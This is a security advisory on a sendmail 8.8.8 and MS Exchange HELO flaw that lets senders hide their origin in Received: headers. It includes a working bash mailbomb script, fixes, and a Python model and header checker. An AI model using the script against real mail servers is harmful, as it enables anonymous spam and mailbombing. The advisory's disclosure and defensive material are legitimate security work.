COMMAND
sendmail
SYSTEMS AFFECTED
Systems running sendmail 8.8.8 (and prior) and MS Exchange
PROBLEM
Michal Zalewski recently found the following. When someone mailbombs
you, or tries to send fake mail, spam, etc., sendmail normally records
the sender's real host name and address in the Received: header it
adds to the message:
--
From spam@flooders.net Mon Jan 5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!!
--
That's perfect: now you know who is responsible for that annoying
junk in your mailbox: "Received: from spammer
(marc@math.university.edu [150.129.84.5])". Nothing easier...
But Zalewski found a small hole which allows a user to hide his
identity and send mail anonymously. The only thing you need to do is
pass a HELO string longer than approximately 1024 bytes: the sender's
location and the other useful connection information will be cropped
from the Received: header. The message headers then tell you nothing
interesting. Sometimes the sender becomes quite untraceable (though
not always: it may still be possible to obtain logs from the machine
that was used to send):
--
From spam@flooders.net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!! Now guess who am I...
--
Here's a simple example of how sendmail's HELO hole is used. Note
that this script has been written ONLY to show how easy it may be to
send fake mail and mailbombs with the cooperation of sendmail. The
script is very slow and restricted in many ways, but it illustrates
the problem well (note that some non-Berkeley daemons are also
affected):
#!/bin/bash
# SafeBomb 1.02b -- sendmail HELO hole usage example
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe      # generated sub-script that speaks SMTP
TIMEOUT=2               # seconds to wait before closing each session
LIMIT=10                # max. concurrent telnet sessions
MAX=20                  # stop after this many messages
echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo
if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo " msgfile - file to send as a message body"
  echo " address - address of lucky recipient"
  echo " server  - outgoing smtp server w/sendmail"
  echo " sender  - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  echo
  sleep 1
  exit 0
fi
if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
fi
echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
# The HELO parameter: "_safebomb_" repeated 113 times (1130 bytes), well
# past the ~1024-byte point at which sendmail 8.8.8 crops the Received:
# header and loses the real "(user@host [ip])" clause.
HELO=""
i=0
while [ $i -lt 113 ]; do
  HELO="${HELO}_safebomb_"
  i=$((i+1))
done
# Build the SMTP dialogue as a script; the message body is embedded in a
# here-document so it is emitted verbatim between DATA and the final ".".
echo "echo \"helo $HELO\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"
echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0
while [ -f $1 ]; do
  # Each run pipes the scripted dialogue into a fresh telnet session.
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  # Throttle: wait while LIMIT or more telnet sessions are still open.
  CONNECTED=`ps|grep -c "telnet $3"`
  if [ "$LIMIT" -le "$CONNECTED" ]; then
    while [ "$LIMIT" -le "$CONNECTED" ]; do
      sleep 1
    done
  fi
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    echo
    exit 0
  fi
done
This bug has been confirmed for MS Exchange too!
SOLUTION
This bug was fixed in version 8.9.0 of sendmail, which limits the
size of the HELO/EHLO parameter to prevent spammers from hiding their
connection information in Received: headers. The current version is
available at:
ftp://ftp.sendmail.org/pub/sendmail/
Suggested fix for older versions: insert an additional length limit
into the HELO/EHLO parameter scanning routine, OR disable
AllowBogusHELO (but that may cause serious trouble, since some
legitimate clients send a HELO without a proper host name). If you
want to keep track of such exploit attempts, compile sendmail 8.8.8
with PICKY_HELO_CHECK defined in conf.h:
#define PICKY_HELO_CHECK 1
This forces sendmail to syslog an authentication warning (a message
at LOG_INFO level) and to include an X-Authentication-Warning: header
in the message, saying which host tried to hide itself. Check the
source (srvrsmtp.c, main.c). LogLevel must also be set to a value
higher than 3 (the default is 9) in sendmail.cf. qmail is not
vulnerable.
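As an added example (not part of the original advisory and not sendmail's own code), the following Python models both halves of the above: the 8.8.8 behaviour in which the Received: line is rendered into a fixed-size buffer so that an overlong HELO pushes the real "(user@host [ip])" clause off its end, the 8.9.0-style fix that clamps the HELO parameter and adds an X-Authentication-Warning: header, and a small checker that flags a Received: header carrying the hole's signature. The 1024-byte buffer, the 256-byte HELO limit, the warning wording and the sample identities are assumptions chosen to mirror the advisory's sample headers; sendmail's real values differ.

```python
"""Model of the sendmail 8.8.8 HELO hole and an 8.9.0-style length limit.

Added example, not sendmail's code. LINE_BUFFER, HELO_LIMIT and the
X-Authentication-Warning wording are assumptions mirroring the advisory.
"""
import re

LINE_BUFFER = 1024   # assumed: the rendered header line is cut here
HELO_LIMIT = 256     # assumed: hardened cap on the HELO/EHLO parameter
MYHOST = "myhost.com"


def received_vulnerable(helo, user, host, ip, msgid="WAA00376"):
    """8.8.8 behaviour: HELO goes in unbounded, so an overlong one pushes
    the real '(user@host [ip])' clause past the buffer; it is silently lost."""
    line = (f"Received: from {helo} ({user}@{host} [{ip}])\n"
            f"\tby {MYHOST} (8.8.8/8.8.8) with SMTP id {msgid}")
    return line[:LINE_BUFFER]


def received_fixed(helo, user, host, ip, msgid="WAA00376"):
    """8.9.0-style: clamp the HELO parameter first so the connection clause
    always survives, and record the attempt (PICKY_HELO_CHECK-like)."""
    warnings = []
    if len(helo) > HELO_LIMIT:
        warnings.append(f"X-Authentication-Warning: {MYHOST}: {host} [{ip}] "
                        f"sent a {len(helo)}-byte HELO, truncated to {HELO_LIMIT}")
        helo = helo[:HELO_LIMIT]
    line = (f"Received: from {helo} ({user}@{host} [{ip}])\n"
            f"\tby {MYHOST} (8.9.0/8.9.0) with SMTP id {msgid}")
    return line, warnings


# "from <helo> (<conn>) by <host>"; the (<conn>) clause is optional so
# its absence can be reported rather than failing the parse.
RECEIVED_RE = re.compile(
    r"^Received: from (?P<helo>\S+)(?:\s+\((?P<conn>[^)]*)\))?\s+by\s+(?P<by>\S+)")


def audit_received(header):
    """Check a receiving MTA's own Received: header for the hole's signature:
    no parseable 'by' clause (line was cropped), no '(user@host [ip])'
    clause, or a HELO name far longer than any real hostname."""
    m = RECEIVED_RE.match(header)
    if m is None:
        return ["header does not parse: no 'by' clause, probably cropped"]
    findings = []
    if m.group("conn") is None:
        findings.append("no (user@host [ip]) clause after the HELO name")
    if len(m.group("helo")) > HELO_LIMIT:
        findings.append(f"HELO name is {len(m.group('helo'))} bytes")
    return findings


if __name__ == "__main__":
    # Constructed sample: the identities from the advisory's first header.
    conn = ("marc", "math.university.edu", "150.129.84.5")
    bomb = "_safebomb_" * 113          # 1130 bytes, as the SafeBomb script sends
    print(received_vulnerable("spammer", *conn))
    print(audit_received(received_vulnerable("spammer", *conn)))
    cropped = received_vulnerable(bomb, *conn)
    print(cropped[:60] + "...", len(cropped), "bytes")
    print(audit_received(cropped))
    hdr, warn = received_fixed(bomb, *conn)
    print(hdr[-70:], warn, audit_received(hdr))
```

Run it and the honest HELO yields a header with the "(marc@math.university.edu [150.129.84.5])" clause and no findings; the 1130-byte HELO yields a line cut at 1024 bytes with the clause gone, which the checker reports as cropped; the fixed builder keeps the clause, emits one warning header, and passes the audit.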